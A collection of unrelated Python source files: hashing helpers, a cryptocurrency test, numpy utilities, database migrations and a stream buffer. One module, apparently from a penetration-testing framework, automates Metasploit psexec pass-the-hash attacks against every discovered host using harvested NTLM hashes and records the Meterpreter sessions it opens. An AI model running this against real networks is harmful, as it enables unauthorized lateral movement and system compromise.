total_time = "{hr}h {min}m {sec}s".format(hr=run_time.tm_hour, min=run_time.tm_min, sec=run_time.tm_sec)
)
#Print final output
print('\n{final_output}\n'.format(final_output=final_output), file=self.output)
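# A minimal usage sketch (hypothetical work loop, not part of the original
# module): update the bar once per processed item, then print the summary.
if __name__ == "__main__":
    bar = ProgressBar(total_items=100)
    for _ in range(100):
        time.sleep(0.01)  # stand-in for real work
        bar()
    bar.done()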
|
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
def compute_checksum(data, *algorithms):
checksums = {}
def _finalize(algorithm):
digest = checksums.get(algorithm.name)
if digest:
checksums[algorithm.name] = digest.finalize().encode('hex')
def _update(algorithm, d):
digest = checksums.get(algorithm.name, hashes.Hash(algorithm, backend=default_backend()))
digest.update(d)
checksums[algorithm.name] = digest
    #: If the argument is an open file object, digest it in chunks
if isinstance(data, file):
while True:
chunk = data.read(100000)
if chunk:
                for algorithm in algorithms:
                    _update(algorithm, chunk)
else:
break
else:
        for algorithm in algorithms:
            _update(algorithm, data)
#: Finalise each of the cryptographic checksums
    for algorithm in algorithms:
        _finalize(algorithm)
#: Return a scalar value or a list of items
if len(checksums) == 1:
return checksums.values()[0]
else:
return checksums.values()
def _hash(algorithm, data, backend=default_backend()):
"""
A helper function used to apply a particular cryptographic hash function to a particular object
:param algorithm: an instance of the chosen cryptographic hash function
:param data: the data to be hashed
:param backend: the backend to use for cryptography.io
:return: the output of the selected cryptographic hash function as an integer
"""
digest = hashes.Hash(algorithm, backend)
digest.update(data)
return int(digest.finalize().encode('hex'), 16)
def sha1(data):
"""
A helper function used to apply the SHA-1 cryptographic hash function to a given block of input data
:param data: the data to be hashed
:return: the output of the SHA-1 cryptographic hash function represented as an integer
"""
return _hash(algorithm=hashes.SHA1(), data=data)
def sha256(data):
"""
A helper function used to apply the SHA-256 cryptographic hash function to a given block of input data
:param data: the data to be hashed
:return: the output of the SHA-256 cryptographic hash function represented as an integer
"""
return _hash(algorithm=hashes.SHA256(), data=data)
def md5(data):
"""
A helper function used to apply the MD5 cryptographic hash function to a given block of input data
:param data: the data to be hashed
:return: the output of the MD5 cryptographic hash function represented as an integer
"""
return _hash(algorithm=hashes.MD5(), data=data)
def blake2s(data):
"""
A helper function used to apply the BLAKE-2s cryptographic hash function to a given block of input data
:param data: the data to be hashed
:return: the output of the BLAKE-2s cryptographic hash function represented as an integer
"""
    return _hash(algorithm=hashes.BLAKE2s(digest_size=32), data=data)
def blake2b(data):
"""
A helper function used to apply the BLAKE-2b cryptographic hash function to a given block of input data
:param data: the data to be hashed
:return: the output of the BLAKE-2b cryptographic hash function represented as an integer
"""
    return _hash(algorithm=hashes.BLAKE2b(digest_size=64), data=data)
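#: Example usage (a minimal sketch; this module assumes a Python 2 interpreter,
#: since it relies on the builtin ``file`` type and ``str.encode('hex')``; the
#: file name below is hypothetical):
#:
#:     compute_checksum('hello world', hashes.SHA256())
#:     with open('somefile.bin', 'rb') as f:
#:         digests = compute_checksum(f, hashes.SHA1(), hashes.MD5())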
|
"""Test resurrection of mined transactions when the blockchain is re-organized."""
from test_framework.test_framework import nealcoinTestFramework
from test_framework.util import *
class MempoolCoinbaseTest(nealcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 1
self.setup_clean_chain = False
def setup_network(self):
# Just need one node for this test
args = ["-checkmempool", "-debug=mempool"]
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, args))
self.is_network_split = False
def run_test(self):
node0_address = self.nodes[0].getnewaddress()
# Spend block 1/2/3's coinbase transactions
# Mine a block.
# Create three more transactions, spending the spends
# Mine another block.
# ... make sure all the transactions are confirmed
# Invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# Mine a new block
# ... make sure all the transactions are confirmed again.
b = [ self.nodes[0].getblockhash(n) for n in range(1, 4) ]
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
spends1_raw = [ create_tx(self.nodes[0], txid, node0_address, 49.99) for txid in coinbase_txids ]
spends1_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw ]
blocks = []
blocks.extend(self.nodes[0].generate(1))
spends2_raw = [ create_tx(self.nodes[0], txid, node0_address, 49.98) for txid in spends1_id ]
spends2_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw ]
blocks.extend(self.nodes[0].generate(1))
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
# Use invalidateblock to re-org back; all transactions should
# end up unconfirmed and back in the mempool
for node in self.nodes:
node.invalidateblock(blocks[0])
        # all transactions should now be back in the mempool, unconfirmed
assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] == 0)
# Generate another block, they should all get mined
self.nodes[0].generate(1)
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
if __name__ == '__main__':
MempoolCoinbaseTest().main()
|
from __future__ import division, print_function
import numpy as np
class OnlineStatistics(object):
def __init__(self, axis=0):
self.axis = axis
self.n = None
self.s = None
self.s2 = None
self.reset()
def reset(self):
self.n = 0
self.s = 0.0
self.s2 = 0.0
def add_data(self, data):
if isinstance(self.axis, (list, tuple)):
self.n += np.prod([data.shape[axis] for axis in self.axis])
else:
self.n += data.shape[self.axis]
self.s += data.sum(axis=self.axis)
self.s2 += (data ** 2).sum(axis=self.axis)
@property
def mean(self):
return self.s / self.n
@property
def std(self):
return np.sqrt((self.s2 - (self.s ** 2) / self.n) / self.n)
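# Example (a minimal sketch): accumulate mean/std over batches without keeping
# the data in memory; the results match np.mean/np.std over the concatenated
# batches.
#
#     stats = OnlineStatistics(axis=0)
#     for _ in range(10):
#         stats.add_data(np.random.randn(100, 3))
#     print(stats.mean, stats.std)  # per-column statistics over 1000 rows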
def divide_nonzero(a, b):
"""
Return a/b for the nonzero elements of b and return 0 for the zero elements of b.
"""
shape = (a * b).shape
nonzero = b != 0
c = np.zeros(shape)
try:
if a.shape == shape:
a = a[nonzero]
except AttributeError:
pass
try:
if b.shape == shape:
b = b[nonzero]
except AttributeError:
pass
c[nonzero] = a / b
return c
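# Example (sketch): elementwise division that returns 0 where b == 0.
#
#     divide_nonzero(np.array([1.0, 2.0]), np.array([2.0, 0.0]))
#     -> array([ 0.5,  0. ])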
def sample_interval(min_limit, max_limit):
assert min_limit.shape == max_limit.shape
assert min_limit.dtype == max_limit.dtype
if min_limit.dtype == np.int:
return np.array([np.random.random_integers(low, high) for (low, high) in zip(min_limit, max_limit)])
else:
return min_limit + np.random.random_sample(min_limit.shape) * (max_limit - min_limit)
def axis2quat(axis, angle):
axis = np.asarray(axis)
    axis = 1.0 * axis / np.linalg.norm(axis)  # normalize to a unit axis (Euclidean norm, not the element sum)
return np.append(np.cos(angle/2.0), axis*np.sin(angle/2.0))
def quaternion_multiply(*qs):
if len(qs) == 2:
q0, q1 = qs
return np.array([-q1[1]*q0[1] - q1[2]*q0[2] - q1[3]*q0[3] + q1[0]*q0[0],
q1[1]*q0[0] + q1[2]*q0[3] - q1[3]*q0[2] + q1[0]*q0[1],
-q1[1]*q0[3] + q1[2]*q0[0] + q1[3]*q0[1] + q1[0]*q0[2],
q1[1]*q0[2] - q1[2]*q0[1] + q1[3]*q0[0] + q1[0]*q0[3]])
else:
return quaternion_multiply(qs[0], quaternion_multiply(*qs[1:]))
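# Example (sketch): composing two 90-degree rotations about z equals a single
# 180-degree rotation about z (quaternions here are laid out as [w, x, y, z]).
#
#     qz90 = axis2quat([0, 0, 1], np.pi / 2)
#     np.allclose(quaternion_multiply(qz90, qz90), axis2quat([0, 0, 1], np.pi))
#     -> True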
def clip_pos_aa(pos_aa, min_dof_limits, max_dof_limits):
assert 3 <= len(pos_aa) <= 6
assert 3 <= len(min_dof_limits) <= 4
assert 3 <= len(max_dof_limits) <= 4
pos, aa = np.split(pos_aa, [3])
pos = np.clip(pos, min_dof_limits[:3], max_dof_limits[:3])
min_angle = min_dof_limits[3] if len(min_dof_limits) > 3 else float('-inf')
max_angle = max_dof_limits[3] if len(max_dof_limits) > 3 else float('inf')
angle = np.linalg.norm(aa)
axis = aa / angle if angle else np.array([0, 0, 1])
angle = np.clip(angle, min_angle, max_angle)
aa = axis * angle
return np.concatenate([pos, aa])
def pack_image(image, fixed_point_min=0.01, fixed_point_max=100.0):
assert image.ndim == 3 and image.shape[2] == 1
image = image.squeeze()
fixed_point_image = np.clip(image, fixed_point_min, fixed_point_max)
fixed_point_image = (2 ** 24) * (fixed_point_image - fixed_point_min) / (fixed_point_max - fixed_point_min)
fixed_point_image = fixed_point_image.astype(np.uint32)
fixed_point_image = fixed_point_image.view(dtype=np.uint8).reshape(fixed_point_image.shape + (4,))[..., :-1]
return fixed_point_image
def unpack_image(fixed_point_image, fixed_point_min=0.01, fixed_point_max=100.0):
fixed_point_image = np.concatenate([fixed_point_image, np.zeros(fixed_point_image.shape[:-1] + (1,), dtype=np.uint8)], axis=-1)
fixed_point_image = fixed_point_image.view(np.uint32).astype(int).squeeze()
fixed_point_image = fixed_point_min + fixed_point_image * (fixed_point_max - fixed_point_min) / (2 ** 24)
image = fixed_point_image.astype(np.float32)
image = np.expand_dims(image, axis=-1)
return image
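# Round-trip sketch: values inside [fixed_point_min, fixed_point_max] survive
# pack_image/unpack_image up to the 24-bit quantization step and float32
# rounding (assumes a little-endian host, as does the uint8/uint32 view above).
#
#     depth = np.random.uniform(0.01, 100.0, (4, 4, 1)).astype(np.float32)
#     packed = pack_image(depth)        # -> (4, 4, 3) uint8
#     restored = unpack_image(packed)   # -> (4, 4, 1) float32
#     np.allclose(depth, restored, atol=1e-4)
#     -> True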
|
"""Change navigation bar relationship.
Revision ID: f8fcd4bb38cc
Revises: 94f861ea7006
Create Date: 2017-02-11 13:57:03.925474
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
revision = 'f8fcd4bb38cc'
down_revision = '94f861ea7006'
Base = declarative_base()
class Page(Base):
__tablename__ = 'page'
id = sa.Column(sa.Integer, primary_key=True)
path = sa.Column(sa.String(200), unique=True)
needs_paid = sa.Column(sa.Boolean)
type = sa.Column(sa.String(256))
class NavigationEntry(Base):
__tablename__ = 'nagivation_entry'
id = sa.Column(sa.Integer, primary_key=True)
parent_id = sa.Column(sa.Integer, sa.ForeignKey('nagivation_entry.id'))
page_id = sa.Column(sa.Integer, sa.ForeignKey('page.id'))
nl_title = sa.Column(sa.String(256))
en_title = sa.Column(sa.String(256))
url = sa.Column(sa.String(256))
external = sa.Column(sa.Boolean)
activity_list = sa.Column(sa.Boolean)
position = sa.Column(sa.Integer)
def upgrade():
conn = op.get_bind()
Session = sessionmaker()
session = Session(bind=conn)
op.add_column('nagivation_entry', sa.Column('page_id', sa.Integer(), nullable=True))
op.create_foreign_key(op.f('fk_nagivation_entry_page_id_page'), 'nagivation_entry', 'page',
['page_id'], ['id'])
nav_entries = session.query(NavigationEntry).all()
for nav_entry in nav_entries:
page = session.query(Page).filter(Page.path == nav_entry.url.strip('/')).first()
if page is None:
continue
nav_entry.page_id = page.id
nav_entry.url = None
session.add(nav_entry)
session.commit()
op.drop_constraint('page_ibfk_2', 'page', type_='foreignkey')
op.drop_column('page', 'navigation_entry_id')
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('page', sa.Column('navigation_entry_id', mysql.INTEGER(display_width=11),
autoincrement=False, nullable=True))
op.create_foreign_key('page_ibfk_2', 'page', 'nagivation_entry', ['navigation_entry_id'],
['id'])
op.drop_constraint(op.f('fk_nagivation_entry_page_id_page'), 'nagivation_entry',
type_='foreignkey')
op.drop_column('nagivation_entry', 'page_id')
### end Alembic commands ###
|
"""
A stream buffer abstraction
StreamBuf is similar to StringIO (or cStringIO)
but will continue to return the same data on
read() until you ack(n), which advances the read
pointer. close()'ing a StreamBuf marks it as
closed but does not prevent further reads -- useful
for allowing a producer to let a consumer know
that there isn't more data coming.
Usage:
s = StreamBuf('Hello')
s.write(', world!')
print s.read()
-> 'Hello, world!'
s.ack(7)
print s.read()
-> 'world!'
s.ack(6)
print s.read()
-> ''
s.close()
Limitations:
- StreamBuf has no seatbelt, no checks
- Not thread safe
"""
import os
import cStringIO
class StreamBuf(object):
    def __init__(self, data=None):
self._buf = ''
self._pos = 0
self._eof = False
self._ready = False
if data:
self.write(data)
def write(self, data):
self._ready = True
self._buf += data
    def ack(self, n):
        self._pos += n
def seek(self, pos):
self._pos = pos
def read(self):
return self._buf[self._pos:]
def close(self):
self._eof = True
def buffer(self):
return self._buf
def clear(self):
self._buf = ''
self._pos = 0
self._eof = False
self._ready = False
def complete(self):
return self.closed() and self._pos >= len(self._buf)
def closed(self):
return self._eof
def ready(self):
return self._ready
|
from app import db
from app.models.base_model import BaseEntity
from app.models.contact import Contact
from app.models.location import Location
class Company(db.Model, BaseEntity):
__tablename__ = 'company'
name = db.Column(db.String(200), unique=True)
description = db.Column(db.Text())
logo_file_id = db.Column(db.Integer, db.ForeignKey('file.id'),
nullable=True)
website = db.Column(db.String(256))
contract_start_date = db.Column(db.Date)
contract_end_date = db.Column(db.Date)
location_id = db.Column(db.Integer, db.ForeignKey('location.id'))
contact_id = db.Column(db.Integer, db.ForeignKey('contact.id'))
rank = db.Column(db.Integer)
location = db.relationship(Location, backref=db.backref('companies',
lazy='dynamic'))
contact = db.relationship(Contact, backref=db.backref('companies',
lazy='dynamic'))
expired: bool
|
import re
from core.actionModule import actionModule
from core.keystore import KeyStore as kb
from core.mymsf import myMsf
from core.utils import Utils
class exploit_msf_psexec_pth(actionModule):
def __init__(self, config, display, lock):
super(exploit_msf_psexec_pth, self).__init__(config, display, lock)
self.title = "Attempt to authenticate via PSEXEC PTH"
self.shortName = "MSFpsexec"
self.description = "execute [use exploit/windows/smb/psexec] on each target"
self.requirements = ["msfconsole"]
self.triggers = ["newNTLMHash"]
self.types = ["passwords"]
self.safeLevel = 4
def getTargets(self):
        # we are interested in every host discovered so far
self.targets = kb.get('host')
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
users = self.getUsers(t)
for user in users:
                    hashes = kb.get("creds/host/" + t + "/username/" + user + "/fullhash")
for passhash in hashes:
# verify we have not tested this host before
if not self.seentarget(t+user+passhash):
# add the new IP to the already seen list
self.addseentarget(t+user+passhash)
myMsf.lock.acquire()
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use exploit/windows/smb/psexec\n")
msf.execute("set RPORT 445\n")
msf.execute("set RHOST " + t + "\n")
msf.execute("set SMBUser " + user + "\n")
msf.execute("set SMBPass " + passhash + "\n")
msf.execute("exploit -j\n")
msf.sleep(int(self.config['msfexploitdelay']))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
result = msf.getResult()
myMsf.lock.release()
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
                            parts = re.findall(r".*Meterpreter session (\d+) opened.*", result)
for part in parts:
self.fire("msfSession")
self.display.verbose("NEW session on : " + t)
kb.add("shell/" + t + "/msf/" + str(part))
# clean up after ourselves
result = msf.cleanup()
return
|
from __future__ import unicode_literals
import accelerator_abstract.models.base_expert_interest
import accelerator_abstract.models.secure_file_system_storage
import accelerator_abstract.utils
from decimal import Decimal
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import embed_video.fields
import mptt.fields
import sitetree.models
import sorl.thumbnail.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
('fluent_pages', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Application',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('application_status', models.CharField(blank=True, choices=[('incomplete', 'Incomplete'), ('complete', 'Complete'), ('submitted', 'Submitted')], max_length=64, null=True)),
('submission_datetime', models.DateTimeField(blank=True, null=True)),
],
options={
'verbose_name_plural': 'Applications',
'db_table': 'accelerator_application',
'ordering': ['startup'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_APPLICATION_MODEL',
},
),
migrations.CreateModel(
name='ApplicationAnswer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('answer_text', models.CharField(blank=True, max_length=2000)),
('application', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATION_MODEL)),
],
options={
'verbose_name_plural': 'Application Answers',
'db_table': 'accelerator_applicationanswer',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_APPLICATIONANSWER_MODEL',
},
),
migrations.CreateModel(
name='ApplicationPanelAssignment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('panel_slot_number', models.IntegerField(blank=True, null=True)),
('notes', models.CharField(blank=True, max_length=200)),
('remote_pitch', models.BooleanField(default=False)),
('application', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATION_MODEL)),
],
options={
'verbose_name_plural': 'assignments of startup applications to panel',
'db_table': 'accelerator_applicationpanelassignment',
'ordering': ('panel_slot_number',),
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_APPLICATIONPANELASSIGNMENT_MODEL',
},
),
migrations.CreateModel(
name='ApplicationQuestion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('question_number', models.IntegerField()),
('section_heading', models.CharField(blank=True, max_length=40)),
('question_text', models.CharField(blank=True, max_length=200)),
('help_text', models.CharField(blank=True, max_length=1000)),
('question_type', models.CharField(choices=[('multiline', 'MultilineText'), ('multichoice', 'MultipleChoice'), ('number', 'Number')], max_length=64)),
('mandatory', models.BooleanField(default=False)),
('text_box_lines', models.IntegerField(default=1)),
('text_limit', models.IntegerField(default=500)),
('text_limit_units', models.CharField(blank=True, choices=[('characters', 'Characters'), ('words', 'Words')], max_length=64)),
('choice_options', models.CharField(blank=True, max_length=4000)),
('choice_layout', models.CharField(blank=True, choices=[('horizontal', 'Horizontal'), ('vertical', 'Vertical'), ('dropdown', 'Dropdown')], max_length=64)),
],
options={
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_APPLICATIONQUESTION_MODEL',
},
),
migrations.CreateModel(
name='ApplicationType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=50)),
('description', models.CharField(blank=True, max_length=500)),
],
options={
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_APPLICATIONTYPE_MODEL',
},
),
migrations.CreateModel(
name='BaseProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('user_type', models.CharField(choices=[('EXPERT', 'Expert'), ('ENTREPRENEUR', 'Entrepreneur'), ('MEMBER', 'Member')], max_length=16)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='baseprofile', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'accelerator_baseprofile',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_BASEPROFILE_MODEL',
},
),
migrations.CreateModel(
name='BucketState',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('basis', models.CharField(choices=[('cycle', 'Cycle'), ('program', 'Program')], default='cycle', max_length=20)),
('name', models.CharField(blank=True, choices=[('stale_nostartup', 'Old Entrepreneurs'), ('stale_startup', 'Old Startups'), ('new_entrepreneurs', 'New Entrepreneurs'), ('unpaid', 'Active Unpaid Startups'), ('unsubmitted', 'Working on Application'), ('submitted', 'Has Submitted Application'), ('new_experts', 'New Experts')], default='unsubmitted', max_length=64, null=True)),
('group', models.CharField(default='Other', max_length=255)),
('sort_order', models.PositiveIntegerField()),
('last_update', models.DateTimeField()),
],
options={
'db_table': 'accelerator_bucketstate',
'ordering': ['sort_order'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_BUCKETSTATE_MODEL',
},
),
migrations.CreateModel(
name='CategoryHeaderPage',
fields=[
('urlnode_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='fluent_pages.UrlNode')),
('is_category_header', models.BooleanField(default=True)),
],
options={
'verbose_name': 'Category Header',
'verbose_name_plural': 'Category Headers',
'db_table': 'pagetype_accelerator_categoryheaderpage',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_CATEGORYHEADERPAGE_MODEL',
'manager_inheritance_from_future': True,
},
bases=('fluent_pages.page',),
),
migrations.CreateModel(
name='Clearance',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('level', models.CharField(choices=[('Exec/MD', 'Exec/MD'), ('Global Manager', 'Global Manager'), ('Program Operations Manager', 'Program Operations Manager'), ('Staff', 'Staff')], max_length=64)),
],
options={
'db_table': 'accelerator_clearance',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_CLEARANCE_MODEL',
},
),
migrations.CreateModel(
name='Criterion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('type', models.CharField(max_length=64)),
('name', models.CharField(max_length=64)),
],
options={
'verbose_name': 'Application Allocator Criterion',
'verbose_name_plural': 'Application Allocator Criteria',
'db_table': 'accelerator_criterion',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_CRITERION_MODEL',
},
),
migrations.CreateModel(
name='CriterionOptionSpec',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('option', models.CharField(blank=True, max_length=64)),
('count', models.IntegerField(default=1)),
('weight', models.FloatField(default=1.0)),
('criterion', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_CRITERION_MODEL)),
],
options={
'verbose_name': 'Application Allocator Criterion Option',
'db_table': 'accelerator_criterionoptionspec',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_CRITERIONOPTIONSPEC_MODEL',
},
),
migrations.CreateModel(
name='Currency',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=64, unique=True)),
('abbr', models.CharField(max_length=3, unique=True)),
('usd_exchange', models.FloatField()),
],
options={
'db_table': 'accelerator_currency',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_CURRENCY_MODEL',
},
),
migrations.CreateModel(
name='EntrepreneurProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('gender', models.CharField(choices=[('f', 'Female'), ('m', 'Male'), ('p', 'Prefer Not To State'), ('o', 'Other'), ('', 'Unknown')], default='', max_length=1)),
('phone', models.CharField(blank=True, max_length=20, validators=[django.core.validators.RegexValidator(message='Digits and +()-.x only', regex='^[0-9x.+() -]+$')], verbose_name='Phone')),
('linked_in_url', models.URLField(blank=True, verbose_name='LinkedIn profile URL')),
('facebook_url', models.URLField(blank=True, verbose_name='Facebook profile URL')),
('twitter_handle', models.CharField(blank=True, max_length=40, verbose_name='Twitter handle')),
('personal_website_url', models.URLField(blank=True, max_length=255, verbose_name='Website URL')),
('landing_page', models.CharField(blank=True, max_length=200, validators=[django.core.validators.RegexValidator('^[^:]*$', 'Must be a page within the site')], verbose_name='Current landing page within the site')),
('image', sorl.thumbnail.fields.ImageField(blank=True, help_text='Suggested size: <400px on the short side', upload_to='profile_pics', verbose_name='Profile Picture')),
('drupal_id', models.IntegerField(blank=True, null=True)),
('drupal_creation_date', models.DateTimeField(blank=True, null=True)),
('drupal_last_login', models.DateTimeField(blank=True, null=True)),
('users_last_activity', models.DateTimeField(blank=True, null=True)),
('newsletter_sender', models.BooleanField(default=False)),
('bio', models.TextField(blank=True, default='')),
],
options={
'db_table': 'accelerator_entrepreneurprofile',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_ENTREPRENEURPROFILE_MODEL',
},
),
migrations.CreateModel(
name='ExpertCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255, unique=True)),
],
options={
'verbose_name': 'Expert Category',
'verbose_name_plural': 'Expert Categories',
'db_table': 'accelerator_expertcategory',
'ordering': ['name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_EXPERTCATEGORY_MODEL',
},
),
migrations.CreateModel(
name='ExpertInterest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
                ('topics', models.TextField(blank=True, help_text='Please provide a list of topics of interest to you')),
],
options={
'verbose_name_plural': 'Expert Interests',
'db_table': 'accelerator_expertinterest',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_EXPERTINTEREST_MODEL',
},
),
migrations.CreateModel(
name='ExpertInterestType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=50)),
('short_description', models.CharField(max_length=255)),
],
options={
'verbose_name_plural': 'Expert Interest Types',
'db_table': 'accelerator_expertinteresttype',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_EXPERTINTERESTTYPE_MODEL',
},
),
migrations.CreateModel(
name='ExpertProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('gender', models.CharField(choices=[('f', 'Female'), ('m', 'Male'), ('p', 'Prefer Not To State'), ('o', 'Other'), ('', 'Unknown')], default='', max_length=1)),
('phone', models.CharField(blank=True, max_length=20, validators=[django.core.validators.RegexValidator(message='Digits and +()-.x only', regex='^[0-9x.+() -]+$')], verbose_name='Phone')),
('linked_in_url', models.URLField(blank=True, verbose_name='LinkedIn profile URL')),
('facebook_url', models.URLField(blank=True, verbose_name='Facebook profile URL')),
('twitter_handle', models.CharField(blank=True, max_length=40, verbose_name='Twitter handle')),
('personal_website_url', models.URLField(blank=True, max_length=255, verbose_name='Website URL')),
('landing_page', models.CharField(blank=True, max_length=200, validators=[django.core.validators.RegexValidator('^[^:]*$', 'Must be a page within the site')], verbose_name='Current landing page within the site')),
('image', sorl.thumbnail.fields.ImageField(blank=True, help_text='Suggested size: <400px on the short side', upload_to='profile_pics', verbose_name='Profile Picture')),
('drupal_id', models.IntegerField(blank=True, null=True)),
('drupal_creation_date', models.DateTimeField(blank=True, null=True)),
('drupal_last_login', models.DateTimeField(blank=True, null=True)),
('users_last_activity', models.DateTimeField(blank=True, null=True)),
('newsletter_sender', models.BooleanField(default=False)),
('salutation', models.CharField(blank=True, max_length=255)),
('title', models.CharField(max_length=255, verbose_name='Professional Title')),
('company', models.CharField(max_length=255, verbose_name='Company Name')),
('privacy_email', models.CharField(choices=[('staff', 'MC Staff Only'), ('finalists and staff', 'Finalists and MC Staff'), ('public', 'All Users')], default='finalists and staff', max_length=64, verbose_name='Privacy - Email')),
('privacy_phone', models.CharField(choices=[('staff', 'MC Staff Only'), ('finalists and staff', 'Finalists and MC Staff'), ('public', 'All Users')], default='finalists and staff', max_length=64, verbose_name='Privacy - Phone')),
('privacy_web', models.CharField(choices=[('staff', 'MC Staff Only'), ('finalists and staff', 'Finalists and MC Staff'), ('public', 'All Users')], default='finalists and staff', max_length=64, verbose_name='Privacy - Web')),
('public_website_consent', models.BooleanField(default=False, verbose_name='Public Website Consent')),
